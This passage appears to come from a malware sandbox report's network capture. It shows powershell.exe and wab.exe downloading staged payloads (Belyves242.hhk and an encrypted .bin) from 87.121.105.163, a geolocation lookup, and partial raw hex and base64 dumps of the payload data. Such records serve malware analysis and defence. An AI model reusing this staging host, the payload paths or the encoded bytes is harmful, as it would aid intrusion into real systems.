                                            Apr 20, 2024 16:05:40.734426975 CEST1.1.1.1192.168.2.60x37fdNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • 87.121.105.163
                                            • geoplugin.net

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.64971087.121.105.163806256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 20, 2024 16:05:06.582158089 CEST172OUTGET /Belyves242.hhk HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                            Host: 87.121.105.163
                                            Connection: Keep-Alive
                                            Apr 20, 2024 16:05:06.779700994 CEST1289INHTTP/1.1 200 OK
                                            Date: Sat, 20 Apr 2024 14:05:06 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Last-Modified: Fri, 19 Apr 2024 15:02:17 GMT
                                            ETag: "64284-616745fa61040"
                                            Accept-Ranges: bytes
                                            Content-Length: 410244
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Data Raw: 36 77 4b 34 6d 4f 73 43 52 4b 43 37 37 4c 77 63 41 4f 73 43 5a 37 6c 78 41 5a 73 44 58 43 51 45 63 51 47 62 36 77 4a 75 79 72 6e 58 6c 56 42 63 63 51 47 62 36 77 4b 6d 79 49 48 42 32 33 72 5a 37 33 45 42 6d 2b 73 43 6e 34 53 42 36 62 49 51 4b 6b 7a 72 41 72 76 62 36 77 49 74 4f 4f 73 43 6c 6a 6c 78 41 5a 75 36 79 2b 75 77 79 4f 73 43 66 65 4c 72 41 70 71 59 63 51 47 62 36 77 4b 45 71 44 48 4b 36 77 4a 73 63 58 45 42 6d 34 6b 55 43 33 45 42 6d 33 45 42 6d 39 48 69 63 51 47 62 36 77 4a 42 6b 49 50 42 42 48 45 42 6d 33 45 42 6d 34 48 35 31 50 56 48 41 6e 7a 4e 63 51 47 62 63 51 47 62 69 30 51 6b 42 48 45 42 6d 2b 73 43 2f 46 32 4a 77 33 45 42 6d 2b 73 43 6c 2f 4f 42 77 35 2f 35 41 67 46 78 41 5a 74 78 41 5a 75 36 54 47 6a 63 6f 4f 73 43 57 42 39 78 41 5a 75 42 36 6b 2f 53 41 39 56 78 41 5a 76 72 41 6e 69 39 67 65 72 39 6c 64 6a 4c 36 77 49 44 63 48 45 42 6d 2b 73 43 75 62 35 78 41 5a 76 72 41 72 55 6e 36 77 49 51 51 6f 73 4d 45 4f 73 43 63 50 42 78 41 5a 75 4a 44 42 4e 78 41 5a 76 72 41 75 52 37 51 75 73 43 36 45 4a 78 41 5a 75 42 2b 67 42 4a 42 41 42 31 31 4f 73 43 5a 45 62 72 41 69 4f 51 69 56 77 6b 44 4f 73 43 57 51 56 78 41 5a 75 42 37 51 41 44 41 41 44 72 41 6c 73 39 63 51 47 62 69 31 51 6b 43 4f 73 43 39 42 7a 72 41 6e 65 62 69 33 77 6b 42 4f 73 43 34 38 46 78 41 5a 75 4a 36 33 45 42 6d 33 45 42 6d 34 48 44 6e 41 41 41 41 4f 73 43 6b 76 66 72 41 76 42 50 55 33 45 42 6d 33 45 42 6d 32 70 41 36 77 4a 30 4b 2b 73 43 6a 51 61 4a 36 2b 73 43 73 4e 50 72 41 6d 39 36 78 34 4d 41 41 51 41 41 41 4d 42 6e 41 6e 45 42 6d 2b 73 43 37 6e 53 42 77 77 41 42 41 41 44 72 41 69 70 50 36 77 4b 58 70 31 4e 78 41 5a 76 72 41 74 34 4a 69 65 74 78 41 5a 74 78 41 5a 75 4a 75 77 51 42 41 41 42 78 41 5a 74 78 41 5a 75 42 77 77 51 42 41 41 44 72 41 75 6a 32 36 77 4c 34 62 6c 50 72 41 71 37 47 36 77 4a 38 4b 6d 72 2f 63 51 47 62 63 51 47 62 67 38 49 46 63 51 47 62 63 51 47 62 4d 66 5a 78 41 5a 74 78 41 5a 73 78 79 58 45 42 6d 33 45 42 6d 34 73 61 36 77 4c 34 49 33 45 42 6d 30 46 78 41 5a 74 78 41 5a 73 35 48 41 70 31 39 48 45 42 6d 2b 73 43 44 78 4a 47 36 77 49 49 30 65 73 43 53 54 61 41 66 41 72 37 75 48 58 64 63 51 47 62 36 77 4b 79 42 59 74 45 43 76 78 78 41 5a 74 78 41 5a 73 70 38 48 45 42 6d 33 45 42 6d 2f 2f 53 63 51 47 62 63 51 47 62 75 67 42 4a 42 41 42 78 41 5a 74 78 41 5a 73 78 77 4f 73 43 47 53 74 78 41 5a 75 4c 66 43 51 4d 36 77 49 58 76 58 45 42 6d 34 45 30 42 78 42 2b 34 59 74 78 41 5a 76 72 41 72 42 57 67 38 41 45 63 51 47 62 63 51 47 62 4f 64 42 31 35 65 73 43 74 41 6e 72 41 6a 64 45 69 66 74 78 41 5a 76 72 41 6b 4d 4f 2f 39 66 72 41 6e 53 4c 36 77 49 58 73 6e 62 37 49 77 4c 31 2f 77 30 4e 4c 79 6e 69 43 74 54 34 33 64 77 54 4b 32 68 75 71 65 31 53 6c 52 48 2f 45 4c 71 79 4a 74 4d 4b 2b 57 54 31 74 66 48 2f 49 42 73 53 68 6b 77 4f 77 4c 6d 6c 68 68 43 5a 63 75 4c 44 2f 34 32 47 45 48 73 70 77 68 37 2f 6c 59 59 51 69 37 41 38 6f 50 2b 56 68 68 42 70 65 79 4e 6c 2b 6a 4c 74 6b 59 45 38 68 35 6e 37 70 6f 6b 51 66 6c 6c 76 6a 33 39 7a 70 6a 72 46 61 54 6b 6c 4c 58 31 36 44 55 73 4d 38 35 6d 38 32 58 34 52 76 32 6f 4f 56 33 7a 68
                                            Data Ascii: 6wK4mOsCRKC77LwcAOsCZ7lxAZsDXCQEcQGb6wJuyrnXlVBccQGb6wKmyIHB23rZ73EBm+sCn4SB6bIQKkzrArvb6wItOOsCljlxAZu6y+uwyOsCfeLrApqYcQGb6wKEqDHK6wJscXEBm4kUC3EBm3EBm9HicQGb6wJBkIPBBHEBm3EBm4H51PVHAnzNcQGbcQGbi0QkBHEBm+sC/F2Jw3EBm+sCl/OBw5/5AgFxAZtxAZu6TGjcoOsCWB9xAZuB6k/SA9VxAZvrAni9ger9ldjL6wIDcHEBm+sCub5xAZvrArUn6wIQQosMEOsCcPBxAZuJDBNxAZvrAuR7QusC6EJxAZuB+gBJBAB11OsCZEbrAiOQiVwkDOsCWQVxAZuB7QADAADrAls9cQGbi1QkCOsC9BzrAnebi3wkBOsC48FxAZuJ63EBm3EBm4HDnAAAAOsCkvfrAvBPU3EBm3EBm2pA6wJ0K+sCjQaJ6+sCsNPrAm96x4MAAQAAAMBnAnEBm+sC7nSBwwABAADrAipP6wKXp1NxAZvrAt4JietxAZtxAZuJuwQBAABxAZtxAZuBwwQBAADrAuj26wL4blPrAq7G6wJ8Kmr/cQGbcQGbg8IFcQGbcQGbMfZxAZtxAZsxyXEBm3EBm4sa6wL4I3EBm0FxAZtxAZs5HAp19HEBm+sCDxJG6wII0esCSTaAfAr7uHXdcQGb6wKyBYtECvxxAZtxAZsp8HEBm3EBm//ScQGbcQGbugBJBABxAZtxAZsxwOsCGStxAZuLfCQM6wIXvXEBm4E0BxB+4YtxAZvrArBWg8AEcQGbcQGbOdB15esCtAnrAjdEiftxAZvrAkMO/9frAnSL6wIXsnb7IwL1/w0NLyniCtT43dwTK2huqe1SlRH/ELqyJtMK+WT1tfH/IBsShkwOwLmlhhCZcuLD/42GEHspwh7/lYYQi7A8oP+VhhBpeyNl+jLtkYE8h5n7pokQfllvj39zpjrFaTklLX16DUsM85m82X4Rv2oOV3zh
                                            Apr 20, 2024 16:05:06.779745102 CEST1289INData Raw: 69 35 43 44 71 67 4b 64 72 2b 43 4c 45 4d 64 67 75 59 72 74 32 45 71 52 6c 36 4b 72 57 34 4a 67 65 72 33 38 59 75 53 52 6c 2f 6f 45 33 49 61 7a 4d 63 35 2b 34 59 75 52 68 49 30 6d 66 69 2f 75 42 42 6c 49 35 59 74 4b 52 32 78 61 45 58 37 68 41 4a
                                            Data Ascii: i5CDqgKdr+CLEMdguYrt2EqRl6KrW4Jger38YuSRl/oE3IazMc5+4YuRhI0mfi/uBBlI5YtKR2xaEX7hAJ2v4IsQcWTn74EefNNR0452+ip81sGKW1n3ZPMRfuF80UxkBX33fMcRfuGz7S2xM4d+4YstKdXQUnFsSSV64dP4KN+PEBjYSZk7pWLIfOWLn/uFihB+ZX94hYgNqf+c9x8J4Ysf87kHEH4Jdxp64QJNYln4YfqcvoS
                                            Apr 20, 2024 16:05:06.779781103 CEST1289INData Raw: 75 48 5a 71 71 58 50 41 78 37 2f 45 77 34 4b 58 44 59 4b 30 73 44 7a 68 31 58 2f 49 30 56 43 55 2f 77 4b 30 6d 69 47 6c 39 51 76 66 51 4c 78 66 2f 41 57 64 76 73 53 2b 41 4a 45 79 41 55 47 56 59 6b 37 52 77 41 52 43 59 71 2b 51 4a 30 39 53 38 6f
                                            Data Ascii: uHZqqXPAx7/Ew4KXDYK0sDzh1X/I0VCU/wK0miGl9QvfQLxf/AWdvsS+AJEyAUGVYk7RwARCYq+QJ09S8oE9F2bTVf7M9Iom7tjjnXli5/7ZYsQfmoGlH7hi6pkGmUeLVqAlikzCvvR9wEx/wq53lUuCtNODmw0/wrRn/fn2Yz3A4IK42VDZ3lAnK9oxKuacl2uNKMH5qVPNIcokbuz9SUJ7u194QKVXuCLEPdsSxF+4TJGGsIy
                                            Apr 20, 2024 16:05:06.779819012 CEST1289INData Raw: 5a 45 2f 41 46 46 55 73 4d 4b 62 51 34 75 42 68 42 2b 37 67 38 36 54 75 57 4c 54 6b 63 70 30 6b 44 47 43 48 49 37 6c 74 51 66 36 66 39 4a 76 69 54 73 79 50 73 56 6d 41 49 37 46 48 73 77 41 64 75 30 73 42 65 5a 6e 2b 69 4b 6a 66 73 51 2f 78 51 6e
                                            Data Ascii: ZE/AFFUsMKbQ4uBhB+7g86TuWLTkcp0kDGCHI7ltQf6f9JviTsyPsVmAI7FHswAdu0sBeZn+iKjfsQ/xQnwNSdVvRlG8c4pg+tIJTa+nuQC4AId3b/G+miJ4ey2iZoDtN/4Yuoof8320utidc21LvouQ3aqYPbE/b/EImLlaEK+YFB+LYtfQLzd+oWKLeQr56JA9EK7tcN5LVHRUw/AE9j7QjPr35Y/N2nZE2MOPs2eBQHfW0LK
                                            Apr 20, 2024 16:05:06.779855967 CEST1289INData Raw: 6a 65 6f 61 62 67 74 36 4d 6d 43 6d 62 2b 74 67 76 73 43 31 61 63 4d 4b 44 6b 77 72 6a 30 50 4a 6b 6a 2f 38 4b 33 74 42 73 44 4e 71 4d 39 77 43 43 43 65 4e 6c 55 6d 4a 39 42 57 46 62 47 38 6f 6a 31 61 78 56 52 72 6e 6c 6f 6b 4b 62 41 6c 6c 41 41
                                            Data Ascii: jeoabgt6MmCmb+tgvsC1acMKDkwrj0PJkj/8K3tBsDNqM9wCCCeNlUmJ9BWFbG8oj1axVRrnlokKbAllAAkNASVmxF0ijJ7Aykn7hi5GHmSpaBe4EgVTli0kl5ExZ/3nbm/tYihB+iTf+b9+EEKGDixBAmyo6MmRqAvCJcsCP3YQQK+GLEGOUewh4vwGnuTpGnszTupLijBDmfix9H3zCONecMqNlemVrsXdnCjxarOhBXu6KIy
                                            Apr 20, 2024 16:05:06.779891968 CEST1289INData Raw: 56 4d 67 63 51 65 45 62 47 6e 79 6d 73 54 6e 2f 6e 50 63 55 39 2b 47 4c 48 2f 4d 74 39 68 42 2b 75 75 32 35 73 58 48 53 6b 5a 44 55 42 6f 79 72 4a 67 34 6b 66 4f 47 4c 6c 67 45 66 4f 74 78 52 43 71 34 63 4a 50 6c 46 56 39 70 75 5a 6a 6b 5a 46 46
                                            Data Ascii: VMgcQeEbGnymsTn/nPcU9+GLH/Mt9hB+uu25sXHSkZDUBoyrJg4kfOGLlgEfOtxRCq4cJPlFV9puZjkZFFkVyhCkrlmueQCRS89/GaI3cSWhtKNxl7G9/1S/En7hfyklzgqlSuOLENAGWJj/VL8SfuFWsQj3R4ApZaXpWi2FK67fzDi6M26FHkhHK8vViRB+lKH4xAiIEC9YrPkhOwrhFoYUe/8g9NdBrwIR9hl6D10dMwLeRdF
                                            Apr 20, 2024 16:05:06.779928923 CEST1289INData Raw: 7a 62 77 6b 70 47 50 59 51 35 31 44 32 42 36 53 6d 2f 6f 50 4a 47 2f 7a 5a 55 6f 4a 47 69 53 6c 41 73 50 47 52 58 68 31 4f 32 48 55 67 75 57 65 31 52 36 6a 56 30 35 4b 54 34 43 6a 6d 58 50 6f 70 6a 59 4f 70 7a 6f 68 76 49 5a 5a 62 59 2b 39 79 47
                                            Data Ascii: zbwkpGPYQ51D2B6Sm/oPJG/zZUoJGiSlAsPGRXh1O2HUguWe1R6jV05KT4CjmXPopjYOpzohvIZZbY+9yGB1WfALFKO3Nwsj324hBFnZosQbAEntFRh+4/rrDNtR5qAuavchmXKLFoMH9fyK1QePlB/4YtGwIyKN9JgfW+1O7uRkPNC7eKyF5md4LiNRjL7Ezwq/JlURbXJaA+fINBuAVUwWbJvBli7MFRlU0v7KdUfeKy+EH7b
                                            Apr 20, 2024 16:05:06.779967070 CEST1289INData Raw: 72 6a 74 30 79 6a 49 66 38 53 58 37 43 37 50 41 72 37 32 46 5a 66 54 53 6c 39 41 76 64 2f 2f 68 61 56 76 35 4b 4e 31 2b 52 75 47 44 52 51 67 52 44 37 43 46 2f 49 32 48 4b 73 55 41 6f 62 6c 77 70 74 41 6f 34 42 45 48 37 75 42 41 6f 49 34 59 74 50
                                            Data Ascii: rjt0yjIf8SX7C7PAr72FZfTSl9Avd//haVv5KN1+RuGDRQgRD7CF/I2HKsUAoblwptAo4BEH7uBAoI4YtPGBZIz5u63a6VIM6w/yd58z4SCuajRQ2DL30C8X/QFiimlo/xI/I8PTVlsL/YWrUhkhPhc4mqBvcVlIFSEGRQSRhkWU73ZH0RfuEzS9mtZdzMtA8Bj/NEYc95qlIFGbWC0NlxzJKE9NflqavOau28wYa6vq1wfakl5
                                            Apr 20, 2024 16:05:06.780004025 CEST1289INData Raw: 6f 61 78 6c 32 66 4f 30 70 70 4a 2b 4e 6b 64 7a 71 32 67 49 55 71 74 4a 41 58 4d 53 53 76 38 74 66 65 4c 37 66 73 39 50 73 55 6e 44 48 67 43 43 42 6c 64 4f 69 73 7a 79 54 67 72 6d 79 32 43 64 68 38 78 6d 39 37 67 34 62 67 52 35 30 34 33 45 6d 75
                                            Data Ascii: oaxl2fO0ppJ+Nkdzq2gIUqtJAXMSSv8tfeL7fs9PsUnDHgCCBldOiszyTgrmy2Cdh8xm97g4bgR5043EmuxB+315NJYM6NKqtAI1W4IsQLVoQ093pCuMzJIKE/xLft3ctCuP80Kpo/wqLn/zJ24z3AYoI49lKbG8G+gNd/4iaJWH+wRM2EcLYxaD6xw3pixV2FqvSRqtWRlijOET0iuyxX4tRIA4P/SZlU0uyNg5mZGWYFHiqDD
                                            Apr 20, 2024 16:05:06.780041933 CEST1289INData Raw: 73 32 42 34 59 74 4f 63 4a 4a 47 56 6a 36 4f 69 48 47 69 77 4b 53 4c 39 32 43 37 79 36 58 57 58 55 6b 4c 4c 37 79 56 67 76 7a 53 73 55 51 76 38 2f 38 32 76 65 38 75 33 32 70 46 53 78 63 45 50 6a 78 71 45 45 57 32 31 69 78 42 41 57 68 50 78 47 76
                                            Data Ascii: s2B4YtOcJJGVj6OiHGiwKSL92C7y6XWXUkLL7yVgvzSsUQv8/82ve8u32pFSxcEPjxqEEW21ixBAWhPxGv5+jtge/jQWlYvOgrEz7U8FIiXRLf87Sws42w3UhPA3laan0/MOQeJoahl/fA7qAOtLsit1q4iSaZDxECvdTCCHssAnh7bqPLkKJFpTxkmesDLlYFUSkZcoHv7qYHrHSjvqkY9qivuGYGIQERUWmXcwFHWi8V0I6nU
                                            Apr 20, 2024 16:05:06.976675987 CEST1289INData Raw: 52 42 2b 74 6a 53 32 76 7a 37 43 6b 59 6d 45 63 6f 44 62 59 48 77 41 62 45 6b 2b 6b 62 6c 71 6f 64 79 57 59 48 79 52 59 56 4c 4a 6d 58 6e 49 61 42 57 6f 34 4f 6a 35 56 72 74 6b 76 30 79 32 68 2f 6e 6d 36 53 4a 2f 76 67 6d 79 4f 78 6a 58 74 39 35
                                            Data Ascii: RB+tjS2vz7CkYmEcoDbYHwAbEk+kblqodyWYHyRYVLJmXnIaBWo4Oj5Vrtkv0y2h/nm6SJ/vgmyOxjXt95UfqNweTFyecChisb6qfNeaz+STyhfOZcEuwrWyEyXFP8PyZO0vgr+KoFH7vf32mA+brG8doxlTvdU7hJ+4TXSVxHVkYh4p2UitjQ2Wd6MkYlUAiUvYGRvbD9gkYn1FjwUsBeZn+Cyjfs7+xgLsTSiWr/7hejLaTGH


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.64971887.121.105.163805776C:\Program Files (x86)\Windows Mail\wab.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 20, 2024 16:05:37.686614990 CEST187OUTGET /DtExZZndAxdvvlCKCcIVF127.bin HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                            Host: 87.121.105.163
                                            Cache-Control: no-cache
                                            Apr 20, 2024 16:05:37.889302015 CEST1289INHTTP/1.1 200 OK
                                            Date: Sat, 20 Apr 2024 14:05:37 GMT
                                            Server: Apache/2.4.41 (Ubuntu)
                                            Last-Modified: Fri, 19 Apr 2024 13:56:34 GMT
                                            ETag: "78c40-6167374a0a880"
                                            Accept-Ranges: bytes
                                            Content-Length: 494656
                                            Content-Type: application/octet-stream
                                            Data Raw: cd 35 d7 c9 f4 b1 88 7b f9 de 0f 6c 25 93 b5 11 35 e8 20 bc 54 6c f6 68 52 c0 77 b0 c3 6e 24 b1 1e 06 a2 d1 a8 86 ee 10 50 76 16 84 9f f3 b2 ce 71 72 57 29 96 b3 e5 50 d2 7b 15 5a ad 43 ae 1d 21 5f 39 04 dd f3 e1 d6 aa a6 63 a1 8b d1 83 4c 2f c7 da b2 69 00 ce 06 79 e0 a9 bf 88 ef 8b 1a 84 41 b2 d5 3e 6a 43 f3 87 8c 83 94 27 c2 1a 7d ff db b3 f3 c0 c8 bd c9 2a a3 8d 0c 50 77 60 8b 1e 2e 0d 48 bc 87 8f f7 bb e9 72 82 de eb a8 75 61 a5 f6 34 d2 17 58 0c d4 9a 4d 6e 6a 60 26 99 2b 16 14 55 b3 00 d7 b4 72 f6 ad 37 b7 47 e1 42 75 ef 6d 0f 45 bc 07 e2 23 8f b9 f0 ab 24 d0 b2 6a ea 89 be a0 33 9d d2 6d 0e 6c 6f c4 3c 12 24 42 79 7b 47 69 cb 8b be bc 81 ef 0c 2a 3a 1b 48 bd 91 bc 2c c3 2b a2 71 5b 98 23 7e 40 10 ae 6b c7 5a ba b8 8d 22 1c 26 9a 70 9f e4 3d 49 26 0c 6b 62 73 7f 82 a7 13 e0 1f bd 9b bf 3f 70 b9 3c 85 f6 30 2e f6 37 de 3a 1f ff 94 15 ac 76 51 af 82 84 09 7e 80 4e 7b 1c 65 61 47 89 88 3c 85 32 19 f3 f1 7f f1 26 33 98 9e ce 23 ea 54 a2 98 95 43 86 16 d0 57 75 fc 84 63 2e 22 8f b6 07 76 fc db 23 48 55 0e be cd 57 87 53 ab 68 36 ad f1 77 ca 8a 52 af 9d 78 55 42 2d fc 97 61 6d cc 04 bd 68 53 11 3c 7c 27 ec 65 61 b9 1b 77 de fd 67 b8 5f 1a 09 53 b9 3d f5 56 aa cd 30 3c c3 47 25 2a 87 3c e3 1d 4b bc b3 e0 95 16 cc 99 46 5d 62 9a 33 03 90 60 f6 e1 3d c2 8e e8 2b 2f 74 ea 1c 7b 2d 67 79 5e 6e e5 05 e5 ed c4 62 7e 83 15 81 6c e2 e2 1d a6 49 5b da 0d 03 4b 22 9e f4 b7 fc 40 cf 4f 21 00 81 1d 62 19 05 fa 1b 47 49 ed e3 18 ef 7d 92 8f 9d c5 89 c3 52 70 3f b0 fc bb 0f 06 0e 1f e0 40 a5 73 b9 5f 88 9a 55 fe d2 83 48 44 4e ba 57 02 3f 16 0c 7a 10 4b ee 78 44 76 bf 61 10 72 b3 a1 36 1f 80 d1 5f bf c8 f9 37 c2 7c 25 10 94 9a ed 8a dd cf d9 6a ca 51 03 8b 63 03 a6 d3 56 a7 80 45 dd 4f 5c 38 c8 bb dc 20 2f ed da 1d b0 bd a1 84 a7 72 f8 c4 f8 ba 18 5a 69 dd 59 07 f0 07 46 22 2f f7 59 8c e3 54 c8 c9 ec 12 1a d9 ad f0 64 04 b3 c9 94 2a 4a 0f 29 c7 fb 79 e6 6a 63 c5 93 fe 48 48 31 e4 e2 dd ad 85 e9 81 2b 5d 49 89 79 9c 08 50 59 b4 dd 24 37 e6 48 5b 14 b0 19 93 0f 7f 71 e4 29 d6 9f 96 ea fa 5f 41 09 2d 6c ff 87 a9 d6 d4 9b e7 61 39 95 f6 ff 1c a5 89 b4 2a b9 0a b4 1e 4f 75 6c ad a1 3e 12 d1 d1 7f 2d 39 fe 78 58 4d 73 06 37 12 77 e4 91 30 b6 10 ac 76 8d d1 de a4 81 20 fa 36 2d f3 ff 0a 26 1d 46 02 54 4b b2 a5 c5 08 9f 0d 53 4d a6 94 03 53 64 95 04 47 4f ee ff 36 b9 24 30 4e db e3 28 ea be d5 a5 81 18 3e 4a 38 3c 2a 62 0e 45 02 85 cf e0 ba 1b 2e 7e 35 6b 2e 7b c7 19 c5 28 a7 e5 8a 93 b3 25 46 78 8d 82 f9 24 72 20 48 4a f0 3c de 4c f3 8d 31 bf 0c ab a1 3e 7b d2 99 51 f0 f3 54 b8 1c fb cb d8 76 ca db 33 e5 76 5e 6c 75 d4 fd f1 23 3a 12 c3 42 d5 1b a7 a1 e2 7d 3f bc 3d e0 24 02 f2 4e 31 8f de 6a fd cf 47 29 b1 b7 06 cd fa b0 cc b9 11 09 65 37 76 44 24 eb 37 6c 23 1b 10 0f 4c b8 55 5e 30 2e 1c 5f 83 35 0b ab cb 46 8a d9 80 1b 3c 1e f2 fd c4 d1 a4 aa 1d f5 01 46 76 73 27 b5 be 5d c6 d3 58 1e 87 d9 9e d1 90 37 71 1b 2d 35 02 a9 94 07 9e 97 b2 2c aa a2 04 d8 31 4e 99 7a 7d 87 18 7c 7f 41 36 7d a3 7f 0c 24 9a 7e cb 76 55 d3 c0 8c 18 d9 b3 10 d9 fb a6 04 db 3d a9 f1 2a dd 53 bd 54 82 10 b7 f0 d7 24 91 47 3f 40 7f 84 67 28 8f 39 2e 79 59 96 db 20 6c 51 62 83 80 68 b3 a0 d5 20 77 f0 d3 71 f5 01
                                            Data Ascii: 5{l%5 TlhRwn$PvqrW)P{ZC!_9cL/iyA>jC'}*Pw`.Hrua4XMnj`&+Ur7GBumE#$j3mlo<$By{Gi*:H,+q[#~@kZ"&p=I&kbs?p<0.7:vQ~N{eaG<2&3#TCWuc."v#HUWSh6wRxUB-amhS<|'eawg_S=V0<G%*<KF]b3`=+/t{-gy^nb~lI[K"@O!bGI}Rp?@s_UHDNW?zKxDvar6_7|%jQcVEO\8 /rZiYF"/YTd*J)yjcHH1+]IyPY$7H[q)_A-la9*Oul>-9xXMs7w0v 6-&FTKSMSdGO6$0N(>J8<*bE.~5k.{(%Fx$r HJ<L1>{QTv3v^lu#:B}?=$N1jG)e7vD$7l#LU^0._5F<Fvs']X7q-5,1Nz}|A6}$~vU=*ST$G?@g(9.yY lQbh wq
                                            Apr 20, 2024 16:05:37.889322042 CEST1289INData Raw: b1 4a a1 19 bf fb 1c 6e 19 46 0c 1d 7c f9 d6 4e 6d 8f 07 d2 f0 6b d4 2a d0 c0 7c 4e db 4d e2 ef 9f 21 5f e9 c1 b9 23 ce 1a ce 20 28 d2 92 82 2b 82 b2 1e c4 78 5e 48 22 4d f5 11 82 85 90 36 18 31 74 c3 cb 9c 0a f2 cb 88 92 17 5f 7e 85 d9 bf 43 69
                                            Data Ascii: JnF|Nmk*|NM!_# (+x^H"M61t_~CiM|/h5r9A<SW0>GF7 Jbq8uGZ0aHH6z^1.kH~Ar>u@-o]}oevu`[}:rEbM>{?'vNCL
                                            Apr 20, 2024 16:05:37.889338970 CEST1289INData Raw: 09 97 2f 4a 80 6a 00 97 c5 80 b8 89 f8 88 07 54 27 87 41 da 96 bf 2f 43 1b fd be 80 94 7e 01 72 30 7e 9e b3 1b ae fa be c9 73 60 e5 5b c1 33 60 63 72 03 b4 46 e5 f0 ee 5b 1b 14 73 26 45 f8 ff 1d 51 15 6f 94 81 3f 3f 96 10 ca 6e 0d 63 65 c9 b3 5f
                                            Data Ascii: /JjT'A/C~r0~s`[3`crF[s&EQo??nce_6rS?~L}#0jF!&:L\b*LV(xBC>}Q5qSyLJ[NKhO0RXdFG`S6,NtP9cX}Ih>
                                            Apr 20, 2024 16:05:37.889358044 CEST1289INData Raw: 4a e3 08 c9 58 7f 3c a2 9e 6f b3 52 a6 e5 81 a3 c1 10 58 c5 9b 6e 54 0d c0 3f aa 3c bd f1 bc 5c 17 a7 32 1e 00 c3 40 40 e0 d4 59 ef 96 7d c8 02 fc 53 4b 2d 5f ce ae 2a f7 3e b3 5f c7 29 bf 2e 2e b8 dc b7 6d 03 4f db ac 1c 58 ce 07 5b 0b 52 f4 7f
                                            Data Ascii: JX<oRXnT?<\2@@Y}SK-_*>_)..mOX[R0$mwDeBk%GMy0~^a%1<|x>ETCY0*ZK^?]bY!0"y+/vM.^;#!|gXSI'wXm4Gdc&=E_C2$Y]
                                            Apr 20, 2024 16:05:37.889375925 CEST1289INData Raw: 05 cd d4 c9 99 ff 05 2f dd 33 cb f1 62 f6 e5 57 c2 e4 e8 c3 0c 04 e9 1c 37 c4 46 6a 5e 6e 9f 05 8f ec 2c 32 7d 83 05 42 39 69 0e 4c f5 d2 06 d2 5a 88 b2 19 65 80 ed 96 40 0d a0 cf 27 86 1c 62 92 ce 82 fd 45 3d a6 b3 93 20 95 4b 8d 9d c5 d9 2b 51
                                            Data Ascii: /3bW7Fj^n,2}B9iLZe@'bE= K+Qa?z,@2+qGFKrpIG.:(?&f||@U0X^dV5^8J/f,)ZMF;Qx&h*)p05<Zsyy~?X\0
                                            Apr 20, 2024 16:05:37.889399052 CEST1289INData Raw: 57 65 2f 64 9e 39 a0 cb b4 7b d3 56 ec ba 64 53 6c 2e 69 84 09 27 69 01 b4 dd c0 74 9d 80 1a 52 43 07 a8 42 e5 ad 89 e4 8c f6 4e 36 6b a1 82 e7 56 e4 fb 79 db 1f 9a 6f 1a d0 2a 48 31 ad ef f8 a1 0e b7 43 2b 52 33 88 79 74 69 50 59 b4 83 e6 3f e6
                                            Data Ascii: We/d9{VdSl.i'itRCBN6kVyo*H1C+R3ytiPY?'oadI-hldNK^<Ex{OQUe7!j^SrZ/ZvM. i:)*'t6tjv(29T8P8ibpj&r
                                            Apr 20, 2024 16:05:37.889416933 CEST1289INData Raw: d8 e2 b9 3b 64 78 a1 2e ca ce ca 92 c5 d6 5e 5b fc 53 30 7d 9d 44 cf e9 14 04 3d 58 14 5e db 90 37 69 40 c5 d6 9b 93 f1 a2 2b c5 d5 9d c5 8a 89 c5 da 62 c6 2b 8b 2e 5f 6a b2 a3 3d e6 3a 53 ac 60 7c aa b9 73 cd b3 62 92 f9 24 72 a5 be 15 ff a9 1e
                                            Data Ascii: ;dx.^[S0}D=X^7i@+b+._j=:S`|sb$r1qW@p}p34VB'J+^+X$mm[j]4{4T54)+KGi%!?[,HUvJ++V(>,5?%:D\SSMjm@e
                                            Apr 20, 2024 16:05:37.889435053 CEST1289INData Raw: 0a 72 de 9f 69 ed 76 5d 7c 41 2f a7 34 32 ae d5 68 82 d4 e1 0d 7e 00 dd 66 a2 1d 9f 00 b9 02 57 2b 4a ca 79 ca 3b dc f6 78 26 1d 15 9c f5 79 1b c4 2b 02 a9 94 56 76 89 b2 2c aa fb c6 dc 31 a7 be 7a 7d 87 49 94 67 41 36 7d fa bd 08 24 73 55 cb 76
                                            Data Ascii: riv]|A/42h~fW+Jy;x&y+Vv,1z}IgA6}$sUvUkj&p=w%E4[h$l;c,vf:;Y<_8V$)do>F>Y]j)*?(i06<_X`&@m5+|vb}
                                            Apr 20, 2024 16:05:37.889451981 CEST1289INData Raw: a7 d0 c0 7c 1e 50 83 0a 50 69 de a0 02 fe 34 66 de 4a 43 6d 3c 3a 10 82 2b 3b 86 de ce 68 5e 5d 2d 4d f5 29 07 bf dd 66 7d 20 4f 28 aa c5 c9 4b e7 48 90 eb 3c 0f c5 31 ce da 84 89 58 34 71 32 f0 ba 91 31 2b dc 61 ba b1 25 aa 95 43 9e 91 c3 a7 a4
                                            Data Ascii: |PPi4fJCm<:+;h^]-M)f} O(KH<1X4q21+a%C_vf-]y.CcLf6YF;7)#{:H#O^j9h"=}b{Mi?r,P}w6^t;<mle%WQD~>W*Xl]vHv
                                            Apr 20, 2024 16:05:37.889468908 CEST1289INData Raw: 9d 0c 78 0f 47 98 74 3d 6e 59 df 50 7d 1b dc 22 42 36 29 e7 a9 10 10 9e be 56 ef ce 34 82 b0 b8 48 6f 72 4b 82 31 ec 95 77 db 55 88 8d 86 b0 78 b4 b0 5d a2 9d f2 f4 c2 1b a0 08 5c 76 bb 62 9a 8e 2a ad 60 48 4b d7 10 39 2e 3c 94 5a 82 75 41 f5 17
                                            Data Ascii: xGt=nYP}"B6)V4HorK1wUx]\vb*`HK9.<ZuA h5yb6bQe98;G"7}CK6A~T{`prU$VWB;UL/\vr?VM<$lqdwO<S9YbMO%]Q#$}T`8{`A4tJb5_
